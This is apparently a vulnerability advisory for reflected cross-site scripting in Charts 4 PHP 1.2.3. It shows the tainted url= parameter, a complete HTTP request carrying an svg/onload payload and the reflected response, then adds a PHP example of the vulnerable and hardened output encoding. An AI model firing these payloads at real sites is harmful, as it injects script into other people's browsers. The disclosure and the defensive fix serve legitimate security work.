Charts 4 PHP version 1.2.3 suffers from a cross site scripting vulnerability.
9f52771a595d4f701fedd8c6ec11273b06d58e6e9c1035201c77176077d21fdd
# Exploit Title: Charts 4 PHP 1.2.3 Cross Site Scripting
# Date: 2016/2/7
# Researcher: 1N3 @CrowdShield - https://crowdshield.com
# Vendor Homepage: http://www.chartphp.com
# Software Link: http://www.chartphp.com
# Version: 1.2.3
# CVE : N/A
+- --=[Description:
Charts 4 PHP version 1.2.3 is vulnerable to multiple reflected cross-site scripting vulnerabilities due to a failure to sanitize user input in several default pages via the url= parameter.
+- --=[Affected Params:
url=
+- --=[Bug Evidence:
VULNERABLE CODE:
User input is passed through function parameters (line numbers as in the original report):
6:  $url = $_GET['url'];          <- source: unsanitized GET parameter
8:  if($url)                      <- condition required to reach line 9
9:  $rss = fetch_rss ($url);      <- sink: tainted $url passed to fetch_rss()
Vulnerability is also triggered in:
/crowdshield/charts4php/bootstrap/rss/scripts/magpie_debug.php
/crowdshield/charts4php/bootstrap/rss/scripts/simple_smarty.php
/crowdshield/charts4php/bootstrap/rss/scripts/magpie_slashbox.php
/crowdshield/charts4php/bootstrap/rss/rss_fetch.inc
/crowdshield/charts4php/bootstrap/rss/rss_parse.inc
HTTP REQUEST:
GET /charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27%22--+ HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://crowdshield.com/charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%3Ciframe+src%3D%22+javascript%3Aalert%28%27https%3A%2F%2Fcrowdshield.com%27%29%3B%22%3E%3C%2Fiframe%3E+
Cookie: __cfduid=d89da9abfef7f775eadafcdc1008eac6b1454814806; __utma=242435792.1300894982.1454814681.1454885335.1454891081.5; __utmz=242435792.1454814681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1300894982.1454814681; __atuvc=1%7C5%2C5%7C6; PHPSESSID=qlct9igheoh2ofg7bo8g8ss691; __utmb=242435792.31.10.1454891081; __utmc=242435792; __atuvs=56b7e04adb06138a001
Connection: close
HTTP RESPONSE (excerpt, showing the url= value reflected unencoded into the input's value attribute):
Channel: <p><ul></ul>
<form>
RSS URL: <input type="text" size="30" name="url" value=""><svg/onload=alert(1)>'"-- "><br />
<input type="submit" value="Parse RSS">
</form>
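The response excerpt above shows the root cause: the url= value is written straight into an HTML attribute, so a value containing `">` closes the attribute and the tag and the remainder is parsed as markup. The following is an added example, not Charts 4 PHP's own code: it reconstructs that reflection pattern from the response excerpt (the function names, the `is_acceptable_feed_url` allowlist and the exact markup are assumptions) and places the hardened version beside it, using `htmlspecialchars` with `ENT_QUOTES` so neither double nor single quotes can terminate the attribute.

```php
<?php
// Added example, not the project's source. Reconstructed from the advisory's
// response excerpt; function names and exact markup are assumptions.
declare(strict_types=1);

// Vulnerable pattern: the raw url= value is interpolated into an attribute.
// A value starting with "> closes the attribute and the <input> tag, so the
// rest of the input is rendered as live markup by the browser.
function render_form_vulnerable(string $url): string
{
    return '<form>' . "\n"
        . 'RSS URL: <input type="text" size="30" name="url" value="' . $url . '"><br />' . "\n"
        . '<input type="submit" value="Parse RSS">' . "\n"
        . '</form>' . "\n";
}

// Hardened pattern: encode for the HTML attribute context. ENT_QUOTES encodes
// both " and ' so the value cannot escape either quoting style; ENT_SUBSTITUTE
// replaces invalid UTF-8 instead of silently returning an empty string.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_form_hardened(string $url): string
{
    return '<form>' . "\n"
        . 'RSS URL: <input type="text" size="30" name="url" value="' . html_attr($url) . '"><br />' . "\n"
        . '<input type="submit" value="Parse RSS">' . "\n"
        . '</form>' . "\n";
}

// Upstream check (assumption about what the application needs, not part of
// the advisory): only accept an absolute http(s) URL before the value is
// echoed or handed to fetch_rss(). Output encoding above remains the actual
// XSS fix; this allowlist merely rejects obviously non-URL input early.
function is_acceptable_feed_url(string $url): bool
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true);
}

// Stand-alone demo using the payload decoded from the advisory's request
// line (url=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27%22--+).
if (PHP_SAPI === 'cli') {
    $payload = '"><svg/onload=alert(1)>\'"-- ';
    echo "--- vulnerable ---\n", render_form_vulnerable($payload);
    echo "--- hardened ---\n", render_form_hardened($payload);
    var_dump(is_acceptable_feed_url($payload));
    var_dump(is_acceptable_feed_url('https://example.com/feed.xml'));
}
```

Run it with `php example.php`: the vulnerable output reproduces the broken-out `<svg/onload=...>` element seen in the advisory's response, while the hardened output keeps the whole value inside `value="..."` as `&quot;&gt;&lt;svg/onload=alert(1)&gt;&#039;&quot;-- `. Encoding must be applied at every place the parameter is echoed, which is why the same issue is reported in the other scripts listed above.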